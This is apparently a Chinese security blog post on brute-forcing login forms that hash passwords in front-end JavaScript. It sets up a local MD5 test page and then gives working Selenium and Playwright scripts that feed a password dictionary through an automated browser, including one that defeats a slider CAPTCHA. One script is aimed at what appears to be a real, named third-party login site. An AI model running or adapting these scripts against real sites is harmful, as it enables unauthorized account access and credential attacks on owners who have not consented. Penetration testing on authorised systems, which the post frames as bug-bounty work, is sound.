前言
挖掘SRC的时候,爆破登录框时,发现密码字段被加密了,不知道加密算法,如果是通过前端JS进行加密的话,往往要通过寻找JS文件了解加密过程。找到加密函数以后又要想办法构造密码字典,我个人感觉有点费时费力。那么有没有一个万能的方法呢?
0x01 使用python的selenium库来模拟浏览器自动化点击
在这之前,我只知道通过python的selenium库模拟浏览器来获取标题。
前期准备:
既然要模拟,那就要先搭建环境:
参照网上的拼凑一下
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>加密测试页面</title>
<script src="md5.js"></script>
<script>
function md5passwd(){
passwd = document.getElementById("password").value;
document.getElementById("password").value = hex_md5(passwd);
return true;
}
</script>
</head>
<form action="login.php" method="post" onsubmit="return md5passwd()">
<table width="450" border="0" bgcolor="#000000" cellspacing="1" cellpadding="2"><!--cellspacing指相邻单元格之间的间距,cellpadding指控制单元格内部文字与边框的边距-->
<tbody>
<tr height="30">
<td colspan="2" align="center" bgcolor="#CCCCCC"><font size="5">用户登录</font></td>
</tr>
<tr height="30">
<td width="150" align="right" bgcolor="#E6E6E6">用户名</td>
<td width="300" bgcolor="#E6E6E6">
<input type="text" name="username" id="username" maxlength="20" size="15" /></td>
</tr>
<tr height="30">
<td align="right" bgcolor="#E6E6E6">密码</td>
<td bgcolor="#E6E6E6">
<input name="password" type="password" id="password" size="15" maxlength="20" value=""/></td>
</tr>
<tr height="30">
<td align="center" colspan="2" bgcolor="#CCCCCC">
<input type="submit" name="submit" id="submit" value="提交" />
</td>
</tr>
</form>
<?php
if( isset( $_POST[ 'username' ] ) ) {
$user = $_POST[ 'username' ];
$pass = $_POST[ 'password' ];
echo "username: ",$user;
echo "<br>";
echo "password: ",$pass;
echo "<br>";
if ($pass == "8a30ec6807f71bc69d096d8e4d501ade" and $user == "admin"){
echo "login successfully!";
}else{
echo "用户名或密码错误";
}
}
?>
当用户输入的账户密码为:
username:admin
password:admin666
输出:login successfully!
效果如下:
利用代码:
import time
from selenium import webdriver
chrome_driver = r'C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe'
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--proxy-server=http://127.0.0.1:8080')
def start_chrome():
driver = webdriver.Chrome(executable_path=chrome_driver, chrome_options=chrome_options)
driver.start_client()
return driver
def find_info(path):
elms = driver.find_element_by_xpath(path)
return elms
if __name__ == "__main__":
url = 'http://192.168.107.136/login.php'
driver = start_chrome()
driver.get(url)
user_path = '/html/body/form/table/tbody/tr[2]/td[2]/input'
pass_path = '/html/body/form/table/tbody/tr[3]/td[2]/input'
submit_path = '/html/body/form/table/tbody/tr[4]/td/input'
with open(r'C:\Users\sws123\Desktop\pass.txt', 'r') as f:
lines = [line.strip() for line in f.readlines()]
for line in lines:
user_xpath = find_info(user_path)
pass_xpath = find_info(pass_path)
submit_xpath = find_info(submit_path)
user_xpath.send_keys('admin')
time.sleep(1)
pass_xpath.send_keys(line)
time.sleep(1)
submit_xpath.click()
time.sleep(1)
driver.quit()
准备好密码字典,打开burp,运行以上代码,成功爆破:
0x02 Playwright:浏览器自动化工具
Playwright 是一个强大的 Python 库,仅用一个 API 即可自动执行 Chromium、Firefox、WebKit 等主流浏览器自动化操作,并同时支持以无头模式、有头模式运行。相比传统的 “selenium” 等工具,他可以录制我们对浏览器的操作并自动生成脚本,同时代码也是非常简单,与我们高效工作的目标非常契合。
安装环境:
pip install playwright
python -m playwright install
运行:
python -m playwright codegen --help
python -m playwright codegen --ignore-https-errors -o 123.py http://yypt.xmjlyypt.cn/Login/Index
fofa实战:
from playwright.sync_api import Playwright, sync_playwright, expect
import time
def run(playwright: Playwright) -> None:
# browser = playwright.chromium.launch(headless=False)
browser = playwright.chromium.launch(headless=False,proxy={"server": "http://127.0.0.1:8080"})
context = browser.new_context(ignore_https_errors=True)
username= 'admin'
passwd = '123456'
# Open new page
page = context.new_page()
# Go to http://yypt.xmjlyypt.cn/Login/Index
page.goto("http://yypt.xmjlyypt.cn/Login/Index")
# Click [placeholder="请输入您的帐号"]
page.locator("[placeholder=\"请输入您的帐号\"]").click()
# Fill [placeholder="请输入您的帐号"]
page.locator("[placeholder=\"请输入您的帐号\"]").fill(username)
# Click [placeholder="请输入您的密码"]
page.locator("[placeholder=\"请输入您的密码\"]").click()
time.sleep(2)
# Fill [placeholder="请输入您的密码"]
page.locator("[placeholder=\"请输入您的密码\"]").fill(passwd)
time.sleep(2)
# Click #btnLogin
page.locator("#btnLogin").click()
time.sleep(2)
# Click text=Ok
page.locator("text=Ok").click()
time.sleep(2)
response_html = page.content()
print(f'username: {username}, password: {passwd}, length: {len(response_html)}, title: {page.title()}')
# Close page
# page.close()
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)
滑动验证码案例:
输入账号、密码,点击验证码,然后点击登录。录制过程中并不能拖动滑块,所以无法生成滑块的代码,登录操作其余的大部分代码均已生成,也可以看到其代码是非常简单的
暴力破解脚本:
from playwright.sync_api import Playwright, sync_playwright
# chrome的路径
chromepath = r"chromium-939194\chrome-win\chrome.exe"
from time import sleep
def readpasswd(filename):
fp = open(r"password.txt", 'r', encoding='utf-8')
return fp
def run(playwright: Playwright) -> None:
browser = playwright.chromium.launch(executable_path=chromepath, headless=False)
context = browser.new_context()
# Open new page
page = context.new_page()
fp = readpasswd(1)
username = 'admin'
# 循环读取字典暴破
for passwd in fp:
page.goto("http://xxx.xxx.xxx.xxx/login.html")
# Click input[name="userName"]
page.click("input[name=\"userName\"]")
# Fill input[name="userName"]
page.fill("input[name=\"userName\"]", username)
# Click input[name="password"]
page.click("input[name=\"password\"]")
# Fill input[name="password"]
page.fill("input[name=\"password\"]", passwd)
# Click text=/.*\>\>.*/
# 滑动解锁代码
s = page.wait_for_selector("text=/.*\\>\\>.*/")
box = s.bounding_box()
page.mouse.move(box["x"] + box["width"] / 2, box["y"] + box["height"] / 2)
page.mouse.down()
# for i in range(10):
page.mouse.move(box["x"]+520,box["width"]/2, steps=10)
# Click text=登录
page.mouse.up()
page.click("text=登录")
sleep(1)
response_html = page.content()
print(f'username: {username}, password: {passwd}, length: {len(response_html)}, title: {page.title()}')
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)
